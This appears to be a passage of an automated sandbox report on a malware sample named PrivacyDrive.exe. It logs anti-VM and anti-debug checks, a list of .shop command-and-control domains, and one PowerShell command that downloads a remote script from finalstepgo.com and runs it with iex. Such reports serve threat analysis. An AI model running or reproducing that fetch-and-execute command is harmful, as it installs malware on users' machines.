    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6753
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2978
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - API coverage: 1.4 %
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136 - Thread sleep count: 6753 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7156 - Thread sleep count: 2978 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4320 - Thread sleep time: -11990383647911201s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2836 - Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\svchost.exe TID: 7132 - Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 7000 - Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 2588 - Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\System32\svchost.exe - File opened: PhysicalDrive0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_00477BE0 FindFirstFileW
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_00495D80 FindFirstFileW,FindClose
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
    Source: Amcache.hve.12.dr - Binary or memory string: VMware
    Source: Amcache.hve.12.dr - Binary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.12.dr - Binary or memory string: vmci.syshbin
    Source: Amcache.hve.12.dr - Binary or memory string: VMware, Inc.
    Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW<
    Source: Amcache.hve.12.dr - Binary or memory string: VMware20,1hbin@
    Source: Amcache.hve.12.dr - Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.12.dr - Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.12.dr - Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: svchost.exe, 00000003.00000002.2895794367.0000024B03A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896731206.0000024B09052000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2895818846.0000024B03A2B000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.000000000119D000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.000000000119D000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
    Source: Amcache.hve.12.dr - Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.12.dr - Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.12.dr - Binary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.12.dr - Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015B9000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW`.a
    Source: Amcache.hve.12.dr - Binary or memory string: vmci.sys
    Source: Amcache.hve.12.dr - Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.12.dr - Binary or memory string: vmci.syshbin`
    Source: Amcache.hve.12.dr - Binary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.12.dr - Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.12.dr - Binary or memory string: VMware20,1
    Source: Amcache.hve.12.dr - Binary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.12.dr - Binary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.12.dr - Binary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.12.dr - Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.12.dr - Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.12.dr - Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.12.dr - Binary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.12.dr - Binary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.12.dr - Binary or memory string: VMware Virtual RAM
    Source: Amcache.hve.12.dr - Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.12.dr - Binary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - API call chain: ExitProcess graph end node
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information queried: ProcessInformation
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Process queried: DebugPort
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_051E6730 LdrInitializeThunk
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_0050E173 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_0050E640 LoadLibraryW,GetProcAddress,VirtualAlloc
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_00F8055F mov edx, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_00F80B1F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_00F8116E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_00F8116F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_00F80ECF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 8_2_00F7055F mov edx, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 8_2_00F70B1F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 8_2_00F7116F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 8_2_00F7116E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 8_2_00F70ECF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_005068B4 GetModuleFileNameW,___crtMessageBoxW,GetStdHandle,_strlen,WriteFile,__invoke_watson,GetProcessHeap
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_0050709C SetUnhandledExceptionFilter,UnhandledExceptionFilter

    HIPS / PFW / Operating System Protection Evasion

    Source: PrivacyDrive.exe - String found in binary or memory: surroundeocw.shop
    Source: PrivacyDrive.exe - String found in binary or memory: covvercilverow.shop
    Source: PrivacyDrive.exe - String found in binary or memory: pumpkinkwquo.shop
    Source: PrivacyDrive.exe - String found in binary or memory: abortinoiwiam.shop
    Source: PrivacyDrive.exe - String found in binary or memory: deallyharvenw.shop
    Source: PrivacyDrive.exe - String found in binary or memory: priooozekw.shop
    Source: PrivacyDrive.exe - String found in binary or memory: racedsuitreow.shop
    Source: PrivacyDrive.exe - String found in binary or memory: defenddsouneuw.shop
    Source: PrivacyDrive.exe - String found in binary or memory: candleduseiwo.shop
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_00477990 SetWindowPos,GetWindowRect,GetCursorPos,ShowCursor,ShowCursor,SetCursorPos,mouse_event,mouse_event,mouse_event,SetCursorPos,ShowCursor,SetWindowPos,SetForegroundWindow,SetFocus
    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_00485BE0 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,FileTimeToSystemTime,GetDateFormatW,GetTimeFormatW
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe - Code function: 4_2_00485D60 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetDateFormatW,GetTimeFormatW
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
